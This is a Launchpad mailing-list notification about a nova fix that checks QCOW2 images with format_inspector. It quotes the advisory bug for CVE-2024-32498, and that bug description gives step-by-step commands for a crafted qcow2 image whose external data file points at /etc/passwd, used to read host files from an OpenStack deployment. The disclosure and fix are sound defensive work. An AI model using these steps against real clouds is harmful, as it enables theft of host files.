[Bug 2059809] Fix merged to nova (stable/2023.1)
OpenStack Infra
2059809 at bugs.launchpad.net
Fri Jul 5 19:55:08 UTC 2024
Reviewed: https://review.opendev.org/c/openstack/nova/+/923289
Committed: https://opendev.org/openstack/nova/commit/67e5376dd64407f5aaf1ea5f8c896e356064a2c9
Submitter: "Zuul (22348)"
Branch: stable/2023.1
commit 67e5376dd64407f5aaf1ea5f8c896e356064a2c9
Author: Dan Smith <dansmith at redhat.com>
Date: Wed Apr 17 07:06:13 2024 -0700
Check images with format_inspector for safety
It has been asserted that we should not be calling qemu-img info
on untrusted files. That means we need to know if they have a
backing_file, data_file or other unsafe configuration *before* we use
qemu-img to probe or convert them.
This grafts glance's format_inspector module into nova/images so we
can use it to check the file early for safety. The expectation is that
this will be moved to oslo.utils (or something) later and thus we will
just delete the file from nova and change our import when that happens.
NOTE: This includes whitespace changes from the glance version of
format_inspector.py because of autopep8 demands.
Change-Id: Iaefbe41b4c4bf0cf95d8f621653fdf65062aaa59
Closes-Bug: #2059809
(cherry picked from commit 9cdce715945619fc851ab3f43c97fab4bae4e35a)
(cherry picked from commit f07fa55fd86726eeafcd4c0c687bc49dd4df9f4c)
(cherry picked from commit 0acf5ee7b5dfb6ff0f9a9745f5ad2a0ed2bf65bf)
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809
Title:
[OSSA-2024-001] Arbitrary file access through QCOW2 external data file
(CVE-2024-32498)
Status in Cinder:
Fix Released
Status in Ubuntu Cloud Archive:
Fix Committed
Status in Ubuntu Cloud Archive antelope series:
Fix Committed
Status in Ubuntu Cloud Archive bobcat series:
Fix Committed
Status in Ubuntu Cloud Archive caracal series:
Fix Committed
Status in Ubuntu Cloud Archive ussuri series:
Fix Committed
Status in Ubuntu Cloud Archive yoga series:
Fix Committed
Status in Glance:
Fix Released
Status in OpenStack Compute (nova):
Fix Released
Status in OpenStack Security Advisory:
Fix Released
Bug description:
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.
To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list